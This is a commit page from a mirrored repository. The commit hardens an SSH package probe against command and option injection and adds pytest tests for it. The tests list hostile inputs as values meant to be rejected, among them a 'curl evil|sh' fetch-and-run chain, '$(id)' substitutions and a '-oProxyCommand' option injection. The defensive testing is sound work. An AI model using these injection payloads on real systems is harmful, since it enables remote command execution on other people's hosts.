mirror of
https://github.com/pewdiepie-archdaemon/odysseus.git
synced 2026-06-17 10:15:27 -04:00
Harden Cookbook package SSH probe
This commit is contained in:
+50
-22
@@ -4,6 +4,7 @@ import asyncio
|
|||||||
import json
|
import json
|
||||||
import logging
|
import logging
|
||||||
import os
|
import os
|
||||||
|
import re
|
||||||
import shlex
|
import shlex
|
||||||
import shutil
|
import shutil
|
||||||
import subprocess
|
import subprocess
|
||||||
@@ -57,6 +58,40 @@ def _require_admin(request: Request):
|
|||||||
if not auth_manager.is_admin(user):
|
if not auth_manager.is_admin(user):
|
||||||
raise HTTPException(403, "Admin only")
|
raise HTTPException(403, "Admin only")
|
||||||
|
|
||||||
|
|
||||||
|
def _reject_cross_site(request: Request):
|
||||||
|
"""Reject browser cross-site navigations to shell-touching endpoints."""
|
||||||
|
if request.headers.get("sec-fetch-site") == "cross-site":
|
||||||
|
raise HTTPException(403, "Cross-site request rejected")
|
||||||
|
|
||||||
|
|
||||||
|
_SSH_PORT_RE = re.compile(r"^\d{1,5}$")
|
||||||
|
_SAFE_VENV_RE = re.compile(r"^[A-Za-z0-9_./~-]+$")
|
||||||
|
|
||||||
|
|
||||||
|
def _ssh_base_argv(host: str, ssh_port: str | None) -> list[str]:
|
||||||
|
"""Build an ssh argv prefix for remote probes without local-shell parsing."""
|
||||||
|
if not host or not str(host).strip() or str(host).lstrip().startswith("-"):
|
||||||
|
raise ValueError("invalid ssh host")
|
||||||
|
argv = ["ssh", "-o", "ConnectTimeout=6", "-o", "StrictHostKeyChecking=no"]
|
||||||
|
if ssh_port and str(ssh_port).strip() not in ("", "22"):
|
||||||
|
port = str(ssh_port).strip()
|
||||||
|
if not _SSH_PORT_RE.match(port) or not (1 <= int(port) <= 65535):
|
||||||
|
raise ValueError("invalid ssh port")
|
||||||
|
argv += ["-p", port]
|
||||||
|
argv.append(str(host).strip())
|
||||||
|
return argv
|
||||||
|
|
||||||
|
|
||||||
|
def _venv_activate_prefix(venv: str | None) -> str:
|
||||||
|
"""Return a remote activation prefix while preserving shell expansion of ~."""
|
||||||
|
if not venv:
|
||||||
|
return ""
|
||||||
|
if not _SAFE_VENV_RE.match(venv):
|
||||||
|
raise ValueError("invalid venv path")
|
||||||
|
act = venv if venv.endswith("/bin/activate") else venv.rstrip("/") + "/bin/activate"
|
||||||
|
return f". {act} && "
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
PTY_SUPPORTED = pty is not None and fcntl is not None and hasattr(os, "setsid")
|
PTY_SUPPORTED = pty is not None and fcntl is not None and hasattr(os, "setsid")
|
||||||
@@ -755,13 +790,12 @@ def setup_shell_routes() -> APIRouter:
|
|||||||
never reflected because the check only ever looked at the local host.
|
never reflected because the check only ever looked at the local host.
|
||||||
"""
|
"""
|
||||||
_require_admin(request)
|
_require_admin(request)
|
||||||
|
_reject_cross_site(request)
|
||||||
import importlib, importlib.metadata as importlib_metadata, shlex, json as _json
|
import importlib, importlib.metadata as importlib_metadata, shlex, json as _json
|
||||||
port_arg = ""
|
|
||||||
if ssh_port and str(ssh_port).strip() not in ("", "22"):
|
if ssh_port and str(ssh_port).strip() not in ("", "22"):
|
||||||
_port = str(ssh_port).strip()
|
_port = str(ssh_port).strip()
|
||||||
if not _port.isdigit():
|
if not _SSH_PORT_RE.match(_port) or not (1 <= int(_port) <= 65535):
|
||||||
raise HTTPException(400, "Invalid ssh_port")
|
raise HTTPException(400, "Invalid ssh_port")
|
||||||
port_arg = f"-p {int(_port)} "
|
|
||||||
packages = [
|
packages = [
|
||||||
# ── System ── OS binaries, not pip packages
|
# ── System ── OS binaries, not pip packages
|
||||||
{"name": "tmux", "pip": "", "desc": "Required for Linux/Termux Cookbook background downloads and serves", "category": "System", "target": "remote", "kind": "system", "install_hint": "Run Cookbook server setup, or install tmux with apt/pacman/dnf/apk/zypper."},
|
{"name": "tmux", "pip": "", "desc": "Required for Linux/Termux Cookbook background downloads and serves", "category": "System", "target": "remote", "kind": "system", "install_hint": "Run Cookbook server setup, or install tmux with apt/pacman/dnf/apk/zypper."},
|
||||||
@@ -787,20 +821,13 @@ def setup_shell_routes() -> APIRouter:
|
|||||||
if host and remote_names:
|
if host and remote_names:
|
||||||
try:
|
try:
|
||||||
py = _package_probe_script(remote_names)
|
py = _package_probe_script(remote_names)
|
||||||
src = ""
|
# `venv` is validated but left unquoted so leading ~ expands on
|
||||||
if venv:
|
# the remote; quoting it breaks ~/venv activation.
|
||||||
act = venv if venv.endswith("/bin/activate") else venv.rstrip("/") + "/bin/activate"
|
src = _venv_activate_prefix(venv)
|
||||||
# NOT shlex.quoted: a leading ~ must stay shell-expandable on
|
|
||||||
# the remote (quoting it breaks `~/venv` → activation fails →
|
|
||||||
# the && short-circuits and every package reads as missing).
|
|
||||||
src = f". {act} && "
|
|
||||||
inner = f"{src}python3 -c {shlex.quote(py)}"
|
inner = f"{src}python3 -c {shlex.quote(py)}"
|
||||||
ssh_cmd = (
|
argv = _ssh_base_argv(host, ssh_port) + [inner]
|
||||||
f"ssh -o ConnectTimeout=6 -o StrictHostKeyChecking=no {port_arg}"
|
proc = await asyncio.create_subprocess_exec(
|
||||||
f"{shlex.quote(host)} {shlex.quote(inner)}"
|
*argv, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
|
||||||
)
|
|
||||||
proc = await asyncio.create_subprocess_shell(
|
|
||||||
ssh_cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
|
|
||||||
)
|
)
|
||||||
out, _err = await asyncio.wait_for(proc.communicate(), timeout=12)
|
out, _err = await asyncio.wait_for(proc.communicate(), timeout=12)
|
||||||
txt = out.decode("utf-8", errors="replace").strip()
|
txt = out.decode("utf-8", errors="replace").strip()
|
||||||
@@ -815,6 +842,8 @@ def setup_shell_routes() -> APIRouter:
|
|||||||
if isinstance(probe, dict)
|
if isinstance(probe, dict)
|
||||||
}
|
}
|
||||||
break
|
break
|
||||||
|
except ValueError as e:
|
||||||
|
raise HTTPException(400, str(e))
|
||||||
except Exception:
|
except Exception:
|
||||||
remote_status = {}
|
remote_status = {}
|
||||||
if host and remote_system_names:
|
if host and remote_system_names:
|
||||||
@@ -824,12 +853,9 @@ def setup_shell_routes() -> APIRouter:
|
|||||||
qn = shlex.quote(name)
|
qn = shlex.quote(name)
|
||||||
checks.append(f"if command -v {qn} >/dev/null 2>&1; then echo {qn}=1; else echo {qn}=0; fi")
|
checks.append(f"if command -v {qn} >/dev/null 2>&1; then echo {qn}=1; else echo {qn}=0; fi")
|
||||||
inner = " ; ".join(checks)
|
inner = " ; ".join(checks)
|
||||||
ssh_cmd = (
|
argv = _ssh_base_argv(host, ssh_port) + [inner]
|
||||||
f"ssh -o ConnectTimeout=6 -o StrictHostKeyChecking=no {port_arg}"
|
proc = await asyncio.create_subprocess_exec(
|
||||||
f"{shlex.quote(host)} {shlex.quote(inner)}"
|
*argv, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
|
||||||
)
|
|
||||||
proc = await asyncio.create_subprocess_shell(
|
|
||||||
ssh_cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
|
|
||||||
)
|
)
|
||||||
out, _err = await asyncio.wait_for(proc.communicate(), timeout=12)
|
out, _err = await asyncio.wait_for(proc.communicate(), timeout=12)
|
||||||
txt = out.decode("utf-8", errors="replace").strip()
|
txt = out.decode("utf-8", errors="replace").strip()
|
||||||
@@ -837,6 +863,8 @@ def setup_shell_routes() -> APIRouter:
|
|||||||
name, sep, value = line.strip().partition("=")
|
name, sep, value = line.strip().partition("=")
|
||||||
if sep and name in remote_system_names:
|
if sep and name in remote_system_names:
|
||||||
remote_status[name] = value == "1"
|
remote_status[name] = value == "1"
|
||||||
|
except ValueError as e:
|
||||||
|
raise HTTPException(400, str(e))
|
||||||
except Exception:
|
except Exception:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
|||||||
@@ -7,12 +7,17 @@ import sys
|
|||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from types import SimpleNamespace
|
from types import SimpleNamespace
|
||||||
|
|
||||||
|
import pytest
|
||||||
|
|
||||||
from routes.shell_routes import (
|
from routes.shell_routes import (
|
||||||
_find_line_break,
|
_find_line_break,
|
||||||
_running_in_container,
|
_running_in_container,
|
||||||
_docker_row_status,
|
_docker_row_status,
|
||||||
_package_installed_from_probe,
|
_package_installed_from_probe,
|
||||||
_package_status_note,
|
_package_status_note,
|
||||||
|
_reject_cross_site,
|
||||||
|
_ssh_base_argv,
|
||||||
|
_venv_activate_prefix,
|
||||||
DOCKER_IN_CONTAINER_HINT,
|
DOCKER_IN_CONTAINER_HINT,
|
||||||
)
|
)
|
||||||
|
|
||||||
@@ -241,3 +246,76 @@ class TestPackageProbeStatus:
|
|||||||
|
|
||||||
assert _package_installed_from_probe("diffusers", missing_torch) is False
|
assert _package_installed_from_probe("diffusers", missing_torch) is False
|
||||||
assert _package_installed_from_probe("diffusers", ready) is True
|
assert _package_installed_from_probe("diffusers", ready) is True
|
||||||
|
|
||||||
|
|
||||||
|
class TestSshBaseArgv:
|
||||||
|
def test_basic_host_no_port(self):
|
||||||
|
assert _ssh_base_argv("user@example.com", None) == [
|
||||||
|
"ssh", "-o", "ConnectTimeout=6", "-o", "StrictHostKeyChecking=no",
|
||||||
|
"user@example.com",
|
||||||
|
]
|
||||||
|
|
||||||
|
def test_default_port_22_omitted(self):
|
||||||
|
assert "-p" not in _ssh_base_argv("h", "22")
|
||||||
|
assert "-p" not in _ssh_base_argv("h", "")
|
||||||
|
assert "-p" not in _ssh_base_argv("h", None)
|
||||||
|
|
||||||
|
def test_custom_port_added_as_separate_argv(self):
|
||||||
|
assert _ssh_base_argv("h", "2222")[-3:] == ["-p", "2222", "h"]
|
||||||
|
|
||||||
|
@pytest.mark.parametrize("bad", ["0", "70000", "-1", "8a", "$(id)", "22 22"])
|
||||||
|
def test_bad_port_rejected(self, bad):
|
||||||
|
with pytest.raises(ValueError):
|
||||||
|
_ssh_base_argv("h", bad)
|
||||||
|
|
||||||
|
def test_option_injecting_host_rejected(self):
|
||||||
|
with pytest.raises(ValueError):
|
||||||
|
_ssh_base_argv("-oProxyCommand=touch /tmp/pwn", None)
|
||||||
|
|
||||||
|
@pytest.mark.parametrize("bad", ["", " ", None])
|
||||||
|
def test_empty_host_rejected(self, bad):
|
||||||
|
with pytest.raises(ValueError):
|
||||||
|
_ssh_base_argv(bad, None)
|
||||||
|
|
||||||
|
|
||||||
|
class TestVenvActivatePrefix:
|
||||||
|
def test_empty_returns_blank(self):
|
||||||
|
assert _venv_activate_prefix(None) == ""
|
||||||
|
assert _venv_activate_prefix("") == ""
|
||||||
|
|
||||||
|
def test_appends_bin_activate(self):
|
||||||
|
assert _venv_activate_prefix("~/venv") == ". ~/venv/bin/activate && "
|
||||||
|
|
||||||
|
def test_already_pointing_at_activate(self):
|
||||||
|
assert _venv_activate_prefix("/opt/v/bin/activate") == ". /opt/v/bin/activate && "
|
||||||
|
|
||||||
|
@pytest.mark.parametrize("bad", [
|
||||||
|
"/opt/v && curl evil|sh",
|
||||||
|
"$(id)",
|
||||||
|
"`id`",
|
||||||
|
"v;id",
|
||||||
|
"v\nid",
|
||||||
|
"v|id",
|
||||||
|
])
|
||||||
|
def test_injection_payloads_rejected(self, bad):
|
||||||
|
with pytest.raises(ValueError):
|
||||||
|
_venv_activate_prefix(bad)
|
||||||
|
|
||||||
|
|
||||||
|
class TestRejectCrossSite:
|
||||||
|
@staticmethod
|
||||||
|
def _req(headers):
|
||||||
|
return SimpleNamespace(headers=headers)
|
||||||
|
|
||||||
|
def test_cross_site_rejected(self):
|
||||||
|
from fastapi import HTTPException
|
||||||
|
with pytest.raises(HTTPException) as exc:
|
||||||
|
_reject_cross_site(self._req({"sec-fetch-site": "cross-site"}))
|
||||||
|
assert exc.value.status_code == 403
|
||||||
|
|
||||||
|
@pytest.mark.parametrize("site", ["same-origin", "same-site", "none"])
|
||||||
|
def test_same_origin_and_direct_nav_allowed(self, site):
|
||||||
|
assert _reject_cross_site(self._req({"sec-fetch-site": site})) is None
|
||||||
|
|
||||||
|
def test_missing_header_allowed(self):
|
||||||
|
assert _reject_cross_site(self._req({})) is None
|
||||||
|
|||||||
Reference in New Issue
Block a user